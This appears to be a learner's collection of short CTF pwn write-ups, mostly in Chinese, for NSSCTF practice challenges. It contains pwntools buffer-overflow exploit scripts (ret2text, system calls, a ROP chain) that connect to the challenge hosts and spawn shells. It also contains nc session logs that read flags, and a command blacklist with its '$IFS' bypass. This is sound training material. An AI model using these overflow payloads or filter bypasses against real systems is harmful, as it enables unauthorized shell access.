[SWPUCTF 2021 新生赛]nc签到
用记事本直接打开
import os
art = '''
(( "####@@!!$$ ))
`#####@@!$$` ))
(( '####@!!$:
(( ,####@!!$: ))
.###@!!$:
`##@@!$:
`#@!!$
!@# `#@!$: @#$
#$ `#@!$: !@!
'@!$:
'`\ "!$: /`'
'\ '!: /'
"\ : /"
-."-/\\\-."//.-"/:`\."-.JrS"."-=_\\
" -."-.\\"-."//.-".`-."_\\-.".-\".-//'''
print(art)
print("My_shell_ProVersion")
blacklist = ['cat','ls',' ','cd','echo','<','${IFS}']
while True:
command = input()
for i in blacklist:
if i in command:
exit(0)
os.system(command)
tac$IFS$1flag
[SWPUCTF 2021 新生赛]gift_pwn
main函数里面只有vuln
得到差0x10
看到gift函数里有system
from pwn import *
day3 = remote("node4.anna.nssctf.cn", 28198)
gift = 0x4005B6
payload = b'a' * (0x10 + 8) + p64(gift)
day3.sendline(payload)
day3.interactive()
不知道为什么p64是红色的还能运行,奇怪捏
nssctf [SWPUCTF 2021 新生赛]gift_pwn-CSDN博客
[LitCTF 2023]只需要nc一下~
nc连接
env查看
[CISCN 2019华北]PWN1
checksec --file='/home/kali/Desktop/[CISCN 2019华北]PWN1 (1)'
a.
int func()
{
char v1[44]; // [rsp+0h] [rbp-30h] BYREF
float v2; // [rsp+2Ch] [rbp-4h]
v2 = 0.0;
puts("Let's guess the number.");
gets(v1);
if ( v2 == 11.28125 )
return system("cat /flag");
else
return puts("Its value should be 11.28125");
}
from pwn import *
io = remote("node4.anna.nssctf.cn",28721)
#io = process("D:\浏览器下载\[CISCN 2019华北]PWN1")
payload = cyclic(0x30 - 0x4) + p64(0x41348000)
io.sendline(payload)
io.interactive()
双击黄色字体
b.
from pwn import *
r=remote(" ",port) #port是端口号
addr=0x4006BE
payload=b'a'*(0x30+0x8)+p64(addr) #0x30指v1到ebp的偏移量,ida中给出
r.sendline(payload)
r.interactive()
[NISACTF 2022]ReorPwn?
ida打开
__int64 __fastcall fun(const char *a1)
{
__int64 result; // rax
char v2; // [rsp+17h] [rbp-9h]
int i; // [rsp+18h] [rbp-8h]
int v4; // [rsp+1Ch] [rbp-4h]
v4 = strlen(a1);
for ( i = 0; ; ++i )
{
result = (unsigned int)(v4 / 2);
if ( i >= (int)result )
break;
v2 = a1[i];
a1[i] = a1[v4 - i - 1];
a1[v4 - i - 1] = v2;
}
return result;
}
逆序输出
system执行,
a="123456"
b=a[::-1]
print(b)
b=a[::-2]
print(b)
b=a[1::]
print(b)
b=a[-1::]
print(b)
b=a[1:]
print(b)
b=a[:-1]
print(b)
'''
654321
642
23456
6
23456
12345
'''
[BJDCTF 2020]babystack2.0
main:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf[12]; // [rsp+0h] [rbp-10h] BYREF
size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF
setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
LODWORD(nbytes) = 0;
puts("**********************************");
puts("* Welcome to the BJDCTF! *");
puts("* And Welcome to the bin world! *");
puts("* Let's try to pwn the world! *");
puts("* Please told me u answer loudly!*");
puts("[+]Are u ready?");
puts("[+]Please input the length of your name:");
__isoc99_scanf("%d", &nbytes);
if ( (int)nbytes > 10 )
{
puts("Oops,u name is too long!");
exit(-1);
}
puts("[+]What's u name?");
read(0, buf, (unsigned int)nbytes);
return 0;
}
ackdoor:
__int64 backdoor()
{
system("/bin/sh");
return 1LL;
}
from pwn import *
r=remote("node4.anna.nssctf.cn",28623) #port是端口号
r.sendlineafter('your name:', b'-1')
addr=0x400726
payload=b'a'*(0x10+0x8)+p64(addr)
r.sendlineafter("name?",payload)
r.interactive()
【PWN · ret2text】——[CTFHub]ret2text_ctfhub ret2text-CSDN博客
[HNCTF 2022 Week1]easync
┌──(kali㉿kali)-[~]
└─$ nc node5.anna.nssctf.cn 28081
ls
bin
dev
easync
flag
gift
lib
lib32
lib64
libexec
libx32
nothing
ls nothing
flag1
cat nothing/flag1
nssctf{Nc_
ls gift
2galf
flag2
cat gift/flag2
cat: gift/flag2: Is a directory
cat gift/2galf
@nd_g3t5h31L}
拼接两端flag即可
[BJDCTF 2020]babystack
from pwn import *
r=remote("node4.anna.nssctf.cn",28193) #port是端口号
r.sendlineafter('your name:', b'-1')
addr=0x4006E6
payload=b'a'*(0x10+0x8)+p64(addr)
r.sendlineafter("name?",payload)
r.interactive()
[SWPUCTF 2022 新生赛]Does your nc work?
ls
bin
dev
lib
lib32
lib64
libx32
nss
pwn
cd pwn
/bin/sh: 12: cd: can't cd to pwn
cd nss
ls
ctf
cd ctf
ls
flag
cat flag
NSSCTF{f547677d-eafb-4fd0-8c5d-6d2eafaf067f}
[NISACTF 2022]ezstack
栈读入溢出,
shift+f12
from pwn import *
p=remote("node5.anna.nssctf.cn",28063)
system_plt=0x08048390
sh_addr=0x0804A024
playload=b'b'*(0x48+4)+p32(system_plt)+p32(0x0)+p32(sh_addr)
p.sendline(playload)
p.interactive()
[watevrCTF 2019]Voting Machine 1
shift+f12,找到flag.txt
根据list跳转
from pwn import *
i = remote("node5.anna.nssctf.cn",28478)
address = 0x400807
payload = b'a'*(0x2+8) +p64(address)
i.sendline(payload)
i.interactive()
[NISACTF 2022]ezpie
能用x64打开的都是64位,否则是32位
from pwn import *
i = remote("node5.anna.nssctf.cn",28041)
text=i.recvuntil("70")[-10:]
ld=int(text,16)
print(ld)
pwn=ld+0x9f
pd=b'a'*(0x28+4)+p32(pwn)
i.sendline(pd)
i.interactive()
[HGAME 2023 week1]test_nc
[GFCTF 2021]where_is_shell
from pwn import *
io = remote("node4.anna.nssctf.cn",28113)
context(arch='amd64')
elf = ELF("D:\yzzob\Desktop\shell")
system_plt = elf.plt['system']
bin_sh = 0x400541
pop_rdi_ret = 0x4005e3
ret_addr = 0x400416
payload = flat([b'A' * 24, ret_addr, pop_rdi_ret, bin_sh, system_plt])
io.sendline(payload)
io.interactive()